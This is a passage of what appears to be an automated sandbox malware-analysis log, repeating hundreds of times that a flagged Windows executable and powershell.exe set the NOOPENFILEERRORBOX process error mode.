                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
